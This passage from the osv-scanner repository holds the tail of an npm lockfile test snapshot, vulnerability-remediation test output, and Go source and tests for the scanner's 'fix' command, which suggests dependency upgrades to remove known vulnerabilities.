"resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand_OfflineDatabase/fix_non_interactive_relax_package_json_with_offline_vulns - 1] Loaded npm local db from /osv-scanner/npm/all.zip Resolving /package.json... Found 7 vulnerabilities matching the filter Can fix 3/7 matching vulnerabilities by changing 1 dependencies UPGRADED-PACKAGE: npm-registry-client,6.2.0,^7.5.0 FIXED-VULN-IDS: GHSA-43f8-2h32-f4cj,GHSA-c2qf-rxjj-qqgw,GHSA-c6rq-rjc2-86v2 REMAINING-VULNS: 4 UNFIXABLE-VULNS: 4 Rewriting /package.json... --- [TestCommand_OfflineDatabase/fix_non_interactive_relax_package_json_with_offline_vulns - 2] --- [TestCommand_OfflineDatabase/fix_non_interactive_relax_package_json_with_offline_vulns - 3] { "name": "osv-fix", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo /"Error: no test specified/" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "npm-registry-client": "^7.5.0" } } --- ================================================ FILE: cmd/osv-scanner/fix/command.go ================================================ // Package fix implements the `fix` command for osv-scanner. // It scans a manifest and/or lockfile for vulnerabilities and suggests changes for remediating them. package fix import ( "context" "errors" "fmt" "io" "net/http" "os" "path/filepath" "strings" "time" "deps.dev/util/resolve" "github.com/google/osv-scalibr/inventory/osvecosystem" "github.com/google/osv-scanner/v2/internal/clients/clientimpl/localmatcher" "github.com/google/osv-scanner/v2/internal/clients/clientimpl/osvmatcher" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/depsdev" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/resolution/util" "github.com/google/osv-scanner/v2/internal/version" "github.com/urfave/cli/v3" "golang.org/x/term" "osv.dev/bindings/go/osvdev" ) type strategy string const ( strategyInPlace strategy = "in-place" strategyRelax strategy = "relax" strategyOverride strategy = "override" ) var strategies = []string{string(strategyInPlace), string(strategyRelax), string(strategyOverride)} const ( vulnCategory = "Vulnerability Selection Options:" upgradeCategory = "Dependency Upgrade Options:" autoModeCategory = "non-interactive options:" // intentionally lowercase to force it to sort after the other categories ) type osvFixOptions struct { remediation.Options Client client.ResolutionClient Manifest string ManifestRW manifest.ReadWriter Lockfile string LockfileRW lockfile.ReadWriter NoIntroduce bool OutputJSON bool Stdout io.Writer Stderr io.Writer } func Command(stdout, stderr io.Writer, _ *http.Client) *cli.Command { return &cli.Command{ Name: "fix", Usage: "scans a manifest and/or lockfile for vulnerabilities and suggests changes for remediating them", Description: "scans a manifest and/or lockfile for vulnerabilities and suggests changes for remediating them", Flags: []cli.Flag{ &cli.StringFlag{ Name: "manifest", Aliases: []string{"M"}, Usage: "manifest file to remediate vulnerabilities in", TakesFile: true, }, &cli.StringFlag{ Name: "lockfile", Aliases: []string{"L"}, Usage: "lockfile to remediate vulnerabilities in", TakesFile: true, }, &cli.StringFlag{ Name: "data-source", Usage: "source to fetch package information from; value can be: deps.dev, native", Value: "deps.dev", Action: func(_ context.Context, _ *cli.Command, s string) error { if s != "deps.dev" && s != "native" { return fmt.Errorf("unsupported data-source \"%s\" - must be one of: deps.dev, native", s) } return nil }, }, &cli.StringFlag{ Name: "maven-registry", Usage: "URL of the default Maven registry to fetch metadata", }, &cli.BoolFlag{ Name: "non-interactive", Usage: "[DEPRECATED] run in the non-interactive mode", Hidden: true, Value: true, }, &cli.BoolFlag{ Name: "interactive", Usage: "run in the interactive mode", Action: func(_ context.Context, _ *cli.Command, b bool) error { if b && !term.IsTerminal(int(os.Stdin.Fd())) { return errors.New("interactive mode only to be run in a terminal") } return nil }, }, &cli.StringFlag{ Name: "format", Aliases: []string{"f"}, Usage: "sets the non-interactive output format; value can be: text, json", Value: "text", Action: func(_ context.Context, _ *cli.Command, s string) error { if s == "text" || s == "json" { if s == "json" { cmdlogger.SendEverythingToStderr() } return nil } return fmt.Errorf("unsupported output format \"%s\" - must be one of: text, json", s) }, }, &cli.StringFlag{ Category: autoModeCategory, Name: "strategy", Usage: "remediation approach to use; value can be: " + strings.Join(strategies, ", "), Action: func(_ context.Context, cmd *cli.Command, s string) error { switch strategy(s) { case strategyInPlace: if !cmd.IsSet("lockfile") { return fmt.Errorf("%s strategy requires lockfile", strategyInPlace) } case strategy("relock"): // renamed fallthrough case strategyRelax: if !cmd.IsSet("manifest") { return fmt.Errorf("%s strategy requires manifest file", strategyRelax) } case strategyOverride: if !cmd.IsSet("manifest") { return fmt.Errorf("%s strategy requires manifest file", strategyOverride) } default: return fmt.Errorf("unsupported strategy \"%s\" - must be one of: %s", s, strings.Join(strategies, ", ")) } return nil }, }, &cli.IntFlag{ Category: autoModeCategory, Name: "apply-top", Usage: "apply the top N patches", Value: -1, }, &cli.BoolFlag{ Category: autoModeCategory, Name: "no-introduce", Usage: "exclude patches that would introduce new vulnerabilities", }, &cli.StringSliceFlag{ Category: upgradeCategory, Name: "upgrade-config", Usage: "the allowed package upgrades, in the format `[package-name:]level`. If package-name is omitted, level is applied to all packages. level must be one of (major, minor, patch, none).", DefaultText: "major", }, &cli.IntFlag{ Category: vulnCategory, Name: "max-depth", Usage: "maximum dependency depth of vulnerabilities to consider", Value: -1, }, &cli.Float64Flag{ Category: vulnCategory, Name: "min-severity", Usage: "minimum CVSS score of vulnerabilities to consider", Value: 0, DefaultText: "0.0", }, &cli.StringSliceFlag{ Category: vulnCategory, Name: "vulns", Usage: "explicit list of vulnerability IDs to consider", }, &cli.StringSliceFlag{ Category: vulnCategory, Name: "ignore-vulns", Usage: "list of vulnerability IDs to ignore", }, &cli.BoolFlag{ Category: vulnCategory, Name: "ignore-dev", Usage: "ignore vulnerabilities affecting only development dependencies", }, &cli.BoolFlag{ Category: vulnCategory, Name: "maven-fix-management", Usage: "(pom.xml) also remediate vulnerabilities in dependencyManagement packages that do not appear in the resolved dependency graph", }, // Offline database flags, copied from osv-scanner scan &cli.BoolFlag{ Name: "offline-vulnerabilities", Aliases: []string{"offline"}, Usage: "checks for vulnerabilities using local databases that are already cached", }, &cli.BoolFlag{ Name: "download-offline-databases", Usage: "downloads vulnerability databases for offline comparison", }, &cli.StringFlag{ Name: "local-db-path", Usage: "sets the path that local databases should be stored", Hidden: true, }, }, Action: func(ctx context.Context, cmd *cli.Command) error { return action(ctx, cmd, stdout, stderr) }, } } func action(ctx context.Context, cmd *cli.Command, stdout, stderr io.Writer) error { if !cmd.IsSet("manifest") && !cmd.IsSet("lockfile") { return errors.New("manifest or lockfile is required") } opts := osvFixOptions{ Options: remediation.Options{ ResolveOpts: resolution.ResolveOpts{ MavenManagement: cmd.Bool("maven-fix-management"), }, IgnoreVulns: cmd.StringSlice("ignore-vulns"), ExplicitVulns: cmd.StringSlice("vulns"), DevDeps: !cmd.Bool("ignore-dev"), MinSeverity: cmd.Float64("min-severity"), MaxDepth: cmd.Int("max-depth"), UpgradeConfig: upgrade.ParseUpgradeConfig(cmd.StringSlice("upgrade-config")), }, Manifest: cmd.String("manifest"), Lockfile: cmd.String("lockfile"), NoIntroduce: cmd.Bool("no-introduce"), OutputJSON: cmd.String("format") == "json", Stdout: stdout, Stderr: stderr, } system := resolve.UnknownSystem if opts.Lockfile != "" { rw, err := lockfile.GetReadWriter(opts.Lockfile) if err != nil { return err } opts.LockfileRW = rw system = rw.System() } if opts.Manifest != "" { rw, err := manifest.GetReadWriter(opts.Manifest, cmd.String("maven-registry")) if err != nil { return err } opts.ManifestRW = rw // Prefer the manifest's system over the lockfile's. // TODO: make sure they match system = rw.System() } switch cmd.String("data-source") { case "deps.dev": cl, err := client.NewDepsDevClient(depsdev.DepsdevAPI, "osv-scanner_fix/"+version.OSVVersion) if err != nil { return err } opts.Client.DependencyClient = cl case "native": switch system { case resolve.NPM: var workDir string // Prefer to use the manifest's directory if available. if opts.Manifest != "" { workDir = filepath.Dir(opts.Manifest) } else { workDir = filepath.Dir(opts.Lockfile) } cl, err := client.NewNpmRegistryClient(workDir) if err != nil { return err } opts.Client.DependencyClient = cl case resolve.Maven: cl, err := client.NewMavenRegistryClient(cmd.String("maven-registry")) if err != nil { return err } opts.Client.DependencyClient = cl case resolve.UnknownSystem: fallthrough default: return fmt.Errorf("native data-source currently unsupported for %s ecosystem", system.String()) } } userAgent := "osv-scanner_fix/" + version.OSVVersion if cmd.Bool("offline-vulnerabilities") { matcher, err := localmatcher.NewLocalMatcher( cmd.String("local-db-path"), userAgent, cmd.Bool("download-offline-databases"), ) if err != nil { return err } eco, ok := util.OSVEcosystem[system] if !ok { // Something's very wrong if we hit this panic("unhandled resolve.Ecosystem: " + system.String()) } if err := matcher.LoadEcosystem(ctx, osvecosystem.Parsed{Ecosystem: eco}); err != nil { return err } opts.Client.VulnerabilityMatcher = matcher } else { config := osvdev.DefaultConfig() config.UserAgent = userAgent opts.Client.VulnerabilityMatcher = &osvmatcher.CachedOSVMatcher{ Client: osvdev.OSVClient{ HTTPClient: http.DefaultClient, Config: config, BaseHostURL: osvdev.DefaultBaseURL, }, InitialQueryTimeout: 5 * time.Minute, } } if cmd.Bool("interactive") { return interactiveMode(ctx, opts) } maxUpgrades := cmd.Int("apply-top") strategy := strategy(cmd.String("strategy")) if strategy == "relock" { // renamed strategy = strategyRelax } if !cmd.IsSet("strategy") { // Choose a default strategy based on the manifest/lockfile provided. switch { case remediation.SupportsRelax(opts.ManifestRW): strategy = strategyRelax case remediation.SupportsOverride(opts.ManifestRW): strategy = strategyOverride case remediation.SupportsInPlace(opts.LockfileRW): strategy = strategyInPlace default: return errors.New("no supported remediation strategies for manifest/lockfile") } } switch strategy { case strategyRelax: return autoRelax(ctx, opts, maxUpgrades) case strategyInPlace: return autoInPlace(ctx, opts, maxUpgrades) case strategyOverride: return autoOverride(ctx, opts, maxUpgrades) default: // The strategy flag should already be validated by this point. panic(fmt.Sprintf("non-interactive mode attempted to run with unhandled strategy: \"%s\"", cmd.String("strategy"))) } } ================================================ FILE: cmd/osv-scanner/fix/command_test.go ================================================ package fix_test import ( "context" "os" "slices" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/fix" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/urfave/cli/v3" ) func matchFile(t *testing.T, file string) { t.Helper() b, err := os.ReadFile(file) if err != nil { t.Fatalf("could not read test file: %v", err) } testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, string(b)) } func TestCommand(t *testing.T) { t.Parallel() testutility.SkipIfShort(t) tests := []testcmd.Case{ { Name: "no_args_provided", Args: []string{"", "fix"}, Exit: 127, }, { Name: "fix_non-interactive_in-place_package-lock.json", Args: []string{"", "fix", "--strategy=in-place", "-L", "./testdata/in-place-npm/package-lock.json"}, Exit: 0, }, { Name: "fix_non_interactive_in_place_package_lock_json_with_native_data_source", Args: []string{"", "fix", "--strategy=in-place", "--data-source", "native", "-L", "./testdata/in-place-npm/package-lock.json"}, Exit: 0, }, { Name: "fix_non-interactive_relax_package.json", Args: []string{"", "fix", "--strategy=relax", "-M", "./testdata/relax-npm/package.json"}, Exit: 0, }, { Name: "fix_non-interactive_override_pom.xml", Args: []string{"", "fix", "--strategy=override", "-M", "./testdata/override-maven/pom.xml"}, Exit: 0, }, { Name: "fix_non_interactive_override_pom_xml_with_native_data_source", Args: []string{"", "fix", "--strategy=override", "--data-source", "native", "-M", "./testdata/override-maven/pom.xml"}, Exit: 0, }, { Name: "fix_non-interactive_json_in-place_package-lock.json", Args: []string{"", "fix", "--strategy=in-place", "--format=json", "-L", "./testdata/in-place-npm/package-lock.json"}, Exit: 0, }, { Name: "fix_non-interactive_json_relax_package.json", Args: []string{"", "fix", "--strategy=relax", "--format=json", "-M", "./testdata/relax-npm/package.json"}, Exit: 0, }, { Name: "fix_non-interactive_json_override_pom.xml", Args: []string{"", "fix", "--strategy=override", "--format=json", "-M", "./testdata/override-maven/pom.xml"}, Exit: 0, }, { Name: "errors_with_invalid_data_source", Args: []string{"", "fix", "--data-source=github"}, Exit: 127, }, { Name: "errors_with_unsupported_format", Args: []string{"", "fix", "--format=yaml"}, Exit: 127, }, { Name: "errors_with_unsupported_strategy", Args: []string{"", "fix", "--strategy=force"}, Exit: 127, }, { Name: "errors_when_in_place_used_without_lockfile", Args: []string{"", "fix", "--strategy=in-place", "-M", "./testdata/relax-npm/package.json"}, Exit: 127, }, { Name: "errors_when_relock_used_without_manifest", Args: []string{"", "fix", "--strategy=relock", "-L", "./testdata/in-place-npm/package-lock.json"}, Exit: 127, }, { Name: "errors_when_relax_used_without_manifest", Args: []string{"", "fix", "--strategy=relax", "-L", "./testdata/in-place-npm/package-lock.json"}, Exit: 127, }, { Name: "errors_when_override_used_without_manifest", Args: []string{"", "fix", "--strategy=override", "-L", "./testdata/in-place-npm/package-lock.json"}, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() // fix action overwrites files, copy them to a temporary directory testDir := testutility.CreateTestDir(t) lockfile := testcmd.CopyFileFlagTo(t, tt, "-L", testDir) manifest := testcmd.CopyFileFlagTo(t, tt, "-M", testDir) testcmd.RunAndMatchSnapshots(t, tt) if lockfile != "" { matchFile(t, lockfile) } if manifest != "" { matchFile(t, manifest) } }) } } func TestCommand_OfflineDatabase(t *testing.T) { t.Parallel() testutility.SkipIfShort(t) tests := []testcmd.Case{ { Name: "fix_non_interactive_in_place_package_lock_json_with_offline_vulns", Args: []string{"", "fix", "--strategy=in-place", "--offline-vulnerabilities", "--download-offline-databases", "-L", "./testdata/in-place-npm/package-lock.json"}, Exit: 0, }, { Name: "fix_non_interactive_relax_package_json_with_offline_vulns", Args: []string{"", "fix", "--strategy=relax", "--offline-vulnerabilities", "--download-offline-databases", "-M", "./testdata/relax-npm/package.json"}, Exit: 0, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() // fix action overwrites files, copy them to a temporary directory testDir := testutility.CreateTestDir(t) lockfile := testcmd.CopyFileFlagTo(t, tt, "-L", testDir) manifest := testcmd.CopyFileFlagTo(t, tt, "-M", testDir) testcmd.RunAndMatchSnapshots(t, tt) if lockfile != "" { matchFile(t, lockfile) } if manifest != "" { matchFile(t, manifest) } }) } } func parseFlags(t *testing.T, flags []string, arguments []string) (*cli.Command, error) { // This is a bit hacky: make a mock App with only the flags we care about. // Then use app.RunAndMatchSnapshots() to parse the flags into the cli.Context, which is returned. t.Helper() appFlags := make([]cli.Flag, 0, len(flags)) for _, f := range fix.Command(nil, nil, nil).Flags { if slices.ContainsFunc(f.Names(), func(s string) bool { return slices.Contains(flags, s) }) { appFlags = append(appFlags, f) } } var parsedCmd *cli.Command app := cli.Command{ Flags: appFlags, Action: func(_ context.Context, cmd *cli.Command) error { t.Helper() parsedCmd = cmd return nil }, } err := app.Run(t.Context(), append([]string{""}, arguments...)) return parsedCmd, err } func Test_parseUpgradeConfig(t *testing.T) { t.Parallel() flags := []string{"upgrade-config"} tests := []struct { name string args []string want map[string]upgrade.Level }{ { name: "default_behaviour", args: []string{}, want: map[string]upgrade.Level{ "foo": upgrade.Major, "bar": upgrade.Major, }, }, { name: "general_level_config", args: []string{"--upgrade-config=minor"}, want: map[string]upgrade.Level{ "foo": upgrade.Minor, "bar": upgrade.Minor, }, }, { name: "all_levels", args: []string{ "--upgrade-config", "major:major", "--upgrade-config", "minor:minor", "--upgrade-config", "patch:patch", "--upgrade-config", "none:none", }, want: map[string]upgrade.Level{ "major": upgrade.Major, "minor": upgrade.Minor, "patch": upgrade.Patch, "none": upgrade.None, "other": upgrade.Major, }, }, { name: "package_takes_precedence_over_general", args: []string{ "--upgrade-config", "pkg1:minor", "--upgrade-config", "none", "--upgrade-config", "pkg2:major", }, want: map[string]upgrade.Level{ "pkg1": upgrade.Minor, "pkg2": upgrade.Major, "pkg3": upgrade.None, }, }, { name: "package_names_with_colons", args: []string{ "--upgrade-config=none:patch:minor:major", "--upgrade-config=none:patch:minor", "--upgrade-config=none:patch", "--upgrade-config=none", }, want: map[string]upgrade.Level{ "none:patch:minor": upgrade.Major, "none:patch": upgrade.Minor, "none": upgrade.Patch, "other": upgrade.None, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() cmd, err := parseFlags(t, flags, tt.args) if err != nil { t.Fatalf("error parsing flags: %v", err) } config := upgrade.ParseUpgradeConfig(cmd.StringSlice("upgrade-config")) for pkg, want := range tt.want { if got := config.Get(pkg); got != want { t.Errorf("Config.Get(%s) got = %v, want %v", pkg, got, want) } } }) } } ================================================ FILE: cmd/osv-scanner/fix/interactive.go ================================================ package fix import ( "context" "errors" tea "charm.land/bubbletea/v2" "github.com/google/osv-scanner/v2/internal/remediation" ) // TODO: currently, it's impossible to undo commands // Need to think about how to support this func interactiveMode(ctx context.Context, opts osvFixOptions) error { if !remediation.SupportsRelax(opts.ManifestRW) && !remediation.SupportsInPlace(opts.LockfileRW) { if remediation.SupportsOverride(opts.ManifestRW) { return errors.New("override strategy is not supported in interactive mode") } return errors.New("no supported remediation strategies found") } cl := opts.Client p := tea.NewProgram(newModel(ctx, opts, cl)) m, err := p.Run() if err != nil { return err } // It doesn't look like it's possible to make p.Run() return a custom error, // so we store fatal errors on the model itself. return m.(model).err } ================================================ FILE: cmd/osv-scanner/fix/model.go ================================================ package fix import ( "context" "fmt" "os" "strings" "charm.land/bubbles/v2/help" "charm.land/bubbles/v2/key" tea "charm.land/bubbletea/v2" "charm.land/lipgloss/v2" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/depfile" manif "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/tui" "golang.org/x/term" ) //nolint:recvcheck type model struct { //nolint:containedctx ctx context.Context // Context, mostly used in deps.dev functions options osvFixOptions // options, from command line cl client.ResolutionClient // graph client used for deps.dev functions 